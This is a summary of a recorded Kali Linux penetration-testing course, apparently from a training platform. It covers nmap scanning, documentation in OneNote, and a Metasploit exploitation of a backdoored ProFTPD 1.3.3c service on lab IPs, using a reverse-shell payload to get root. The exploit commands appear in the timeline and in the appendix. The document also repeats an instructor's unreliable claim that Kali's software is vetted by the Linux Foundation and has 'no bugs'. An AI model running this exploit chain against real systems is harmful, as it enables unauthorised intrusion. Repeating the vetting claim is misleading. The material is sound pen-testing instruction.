Course recordings on DaDesktop for Training platform
Visit NobleProg websites for related course
Visit outline: Kali Linux Forensic Tools for Cyber-Incident Response (Course code: kalilinuxforensic)
Categories: Kali Linux
Summary
Overview
This session is a hands-on cybersecurity course focused on penetration testing using Kali Linux, covering network scanning, exploitation with Metasploit, enumeration, and documentation in OneNote. The instructor, Dr. Wesley Phillips, guides students through real-world attack workflows—such as identifying targets, scanning ports, exploiting vulnerabilities, and gaining root access—while emphasizing the importance of thorough documentation, ethical boundaries, and understanding the "why" behind each command. The course integrates practical tool usage, terminal navigation, and professional report-building, with frequent emphasis on portfolio development and real-world context over rote memorization.
Topic (Timeline)
1. Screen Sharing and Environment Setup [00:00:00 - 00:02:58]
The instructor troubleshoots screen-sharing issues during a live demo, ensuring students can follow along with Kali Linux and OneNote side-by-side.
- The instructor repeatedly asks students to minimize competing windows (Zoom, desktop) to focus on the Kali terminal and OneNote.
- Students are instructed to reconnect shared screens after timeouts and re-establish screen-sharing permissions.
- Emphasis is placed on visual alignment: students must see both the terminal and OneNote simultaneously to follow steps accurately.
- The instructor uses “split screen” as a core teaching method, requiring students to manage multiple open applications.
2. Exploitation Workflow: ProFTPD Exploit via Metasploit [00:05:26 - 00:12:09]
The instructor walks through a full exploitation chain targeting a vulnerable ProFTPD service on a test machine.
- Students are instructed to launch
msfconsole, search forproftpd 1.3.3c, and select exploituse 0. - Remote host (
RHOSTS) is set to10.0.3.16, and local host (LHOST) is configured to the Kali machine’s IP (10.0.3.15). - Payload
cmd/unix/reverseis selected and executed, resulting in a shell. - Post-exploitation steps include running
whoami(confirming root access) and navigating to/root. - The instructor stresses the need to verify each step visually and document outcomes in OneNote.
3. Screen Clipping and Documentation in OneNote [00:12:09 - 00:20:36]
The instructor teaches precise screen capture and cleanup techniques in OneNote to build a professional pen test report.
- Students are guided to use OneNote’s “Screen Clipping” tool to capture terminal output without cropping.
- Emphasis is placed on selecting the exact region—from top-left to bottom-right—without including extraneous UI elements.
- Students are instructed to delete placeholder text (“Screen clipping taken on...”) using triple-click and delete.
- Images are resized and aligned manually using corner handles, with strict rules on spacing and formatting.
- The instructor insists on clean, minimal documentation: “I want you to look good.”
4. Network Discovery and Command Verification [00:20:42 - 00:25:55]
The instructor demonstrates how to capture and document network reconnaissance commands and outputs.
- Students are required to capture the output of
fpingandnmapscans, ensuring full command-line context is visible. - The instructor insists on capturing the entire command line, not just the result, to prove execution.
- Students are taught to use
Ctrl+Shift++to zoom terminal output for better clipping accuracy. - Multiple screen clippings are pasted sequentially in OneNote with deliberate spacing between them.
- The instructor corrects over-capturing: “You copied that one twice. You only need one.”
5. Terminal Navigation and Process Management [02:38:25 - 02:45:32]
The instructor covers Linux system navigation, hidden files, process monitoring, and privilege escalation.
- Hidden files are created with
touch .dana.txtand revealed usingls -la. - File permissions are modified with
chmod +xand removed withchmod -xto demonstrate exploitability. - Students learn to identify and kill processes using
ps aux | grep apache2andkill [PID]orkill -9. - Real-time monitoring tools (
htop,atop) are introduced and installed viasudo apt install htop. - The instructor warns against leaving executable hidden files on systems—pen testers exploit them.
6. Pen Test Methodology and Professional Workflow [02:52:53 - 03:00:56]
The instructor outlines the foundational steps of a professional penetration test and ethical boundaries.
- A pen test begins with booting Kali, identifying the target, obtaining written permission, and defining scope.
- First command:
ip ato check local IP; thensudo netdiscoverto find targets on the network. - MAC address matching is used to confirm target identity.
- Connectivity is verified with
pingorfping, stopped withCtrl+C. - The instructor stresses: “You don’t just run commands; you need to understand why you’re doing them.”
7. Advanced Scanning and Exploitation [02:00:39 - 02:28:38]
The instructor demonstrates comprehensive network scanning and exploitation techniques.
- Basic scan:
nmap 10.0.3.16identifies open ports (21, 22, 80). - Aggressive scan:
nmap -A 10.0.3.16enables OS detection, version detection, and script scanning. - Full port scan:
nmap -A -p- 10.0.3.16scans all 65,535 ports; output is saved tonmap-scan.txt. - Exploit search:
searchsploit proftpd 1.3.3cfinds a known backdoor. - Metasploit is used to exploit the service, gain root shell, and navigate to
/root. - SSH access to external targets (e.g.,
bandit0@bandit.labs.overthewire.org) is introduced as a foundational skill.
8. Tool Proficiency and Learning Strategy [01:44:13 - 01:47:50]
The instructor emphasizes self-directed learning, tool mastery, and real-world context.
- Students are directed to Kali’s “Dragon” menu to explore categories: reconnaissance, privilege escalation, forensics, etc.
- Learning must be done by building walkthroughs on vulnerable machines—not just watching.
- ChatGPT is recommended as a learning aid: “Show me real examples to manage and kill Linux processes.”
- Tools like
rig(for generating fake identities) andbtop(for resource monitoring) are introduced as research-level knowledge. - The instructor states: “Kali only pushes vetted software through the Linux Foundation—no malware, no bugs.”
9. Professional Context and Ethical Framework [01:47:50 - 01:50:23]
The instructor shifts focus from technical steps to professional practice and governance.
- Pen testers must understand rules of engagement, timelines, budget, and stress factors—not just commands.
- Students are instructed to bold “objective” and “written permission” in OneNote as non-negotiable prerequisites.
- The instructor refuses to give step-by-step incident response guides: “I expect you to think your way through.”
- Documentation is framed as a legal and professional requirement, not an administrative task.
10. Instructor Background and Teaching Philosophy [03:03:50 - 03:23:53]
The instructor shares his professional background to contextualize the course’s rigor and real-world relevance.
- Served in U.S. Marine Corps communications, NSA technical surveillance, and law enforcement.
- Led cybersecurity teams of 200+; managed insider threat programs at DISA; remediated SolarWinds breach.
- Developed and deployed enterprise security tools (Splunk SOAR) through bureaucratic resistance.
- Trained SOC analysts in GRC; achieved ATO for four systems in high-risk environments.
- Believes in co-creation, documentation, and proving value to leadership—not just technical skill.
- Rejects resume inflation: “Don’t put course badges on your resume as certifications.”
Appendix
Key Concepts
- Penetration testing requires written permission and defined scope before any activity.
- Documentation in OneNote is a professional deliverable, not an afterthought.
- Understanding the purpose of each command is more important than memorizing syntax.
- Hidden files (starting with
.) are critical in both defense and offense. - Network reconnaissance must include MAC address matching to confirm target identity.
- Exploitation workflows follow: scan → identify → exploit → gain access → document.
- Kali Linux tools are vetted and safe; no malware is distributed through official channels.
Tools & Commands
ip a– View local network interfacessudo netdiscover– Discover live hosts on networkping/fping– Test connectivitynmap 10.0.3.16– Scan top 1000 portsnmap -A 10.0.3.16– Aggressive scan (OS, version, scripts)nmap -A -p- 10.0.3.16 > nmap-scan.txt– Full port scan with output savesearchsploit proftpd 1.3.3c– Find known exploitsmsfconsole– Launch Metasploit Frameworkuse 0– Select exploitset RHOSTS 10.0.3.16– Set target IPset LHOST 10.0.3.15– Set attacker IPset payload cmd/unix/reverse– Choose reverse shell payloadexploit– Execute exploitwhoami– Confirm user privilegescd /root– Navigate to root directoryls -la– List all files including hiddentouch .filename– Create hidden filechmod +x .filename– Make file executableps aux | grep apache2– Find running processkill [PID]– Terminate processhtop/btop– Real-time system monitoringman rig– View documentation for identity generation toolhead -10 /etc/passwd– View first 10 userstail/wc -l– View end of file / count lineshistory– View command historyssh username@host -p port– Remote access via SSH